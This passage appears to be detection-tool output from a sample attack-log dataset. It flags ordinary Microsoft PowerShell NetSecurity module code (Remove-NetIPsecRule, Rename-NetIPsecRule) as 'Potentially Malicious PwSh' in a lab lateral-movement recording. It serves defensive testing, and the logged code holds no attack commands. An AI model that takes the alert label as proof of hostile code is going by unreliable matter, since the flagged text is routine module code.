Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, 
[Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPh",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
